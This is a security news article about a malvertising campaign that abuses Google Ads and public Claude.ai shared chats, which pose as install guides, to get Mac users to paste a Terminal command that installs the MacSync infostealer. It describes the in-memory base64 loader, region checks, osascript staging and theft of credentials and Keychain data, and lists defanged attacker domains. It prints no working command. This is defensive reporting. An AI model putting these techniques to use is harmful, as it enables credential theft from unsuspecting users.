Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware

Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.

Users searching for "Claude mac download" might see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that appear as official "Claude Code on Mac" installation guides supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes malware.

At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.

How the Claude.ai Malvertising Attack Works

The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.

This loader runs entirely in memory, which means it leaves minimal traces on the disk. The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.

In one variant, the attackers perform victim profiling before sending the main payload:

• It checks if the machine has Russian or CIS-region keyboard input sources configured. If so, the script exits and sends a cis_blocked status ping to the attacker's server.
• It also gathers the external IP address, hostname, operating system version, and keyboard locale, which it then transmits back to the attacker.
• Afterward, it downloads a second-stage payload that runs through osascript, macOS's built-in scripting engine. This allows the attacker to execute remote code without dropping a traditional binary.

The variant flagged by Albayrak skips the profiling step and proceeds directly to execution. It harvests browser credentials, cookies, and contents of the macOS Keychain, then exfiltrates this data to the attacker's server. Albayrak identified this variant as part of the MacSync macOS information stealer family.

Why This Claude.ai Malware Campaign Is Harder to Detect

Most malvertising campaigns rely on lookalike domains that imitate the real product's website. In this case, the campaign uses the legitimate claude.ai domain, as the malicious instructions are hosted within Claude's own shared chat feature.

There is no fake URL to flag as suspicious, and the service's destination shown in the Google ad appears genuine. A similar campaign that exploited ChatGPT and Grok shared chats was reported in December.

Avoid clicking on sponsored search results when looking for software downloads. Instead, go directly to claude.ai to access the official Claude app. Be cautious with any instructions that ask you to paste terminal commands, no matter where they appear.

The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface.

If a shared chat from Claude prompts you to run terminal commands attributed to support, treat it as malicious.

BleepingComputer contacted Anthropic and Google for comment before publishing. Neither company has issued a public statement regarding the misuse of shared chats and ad placements at this time.

Thank you for being a Ghacks reader. The post Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware appeared first on gHacks.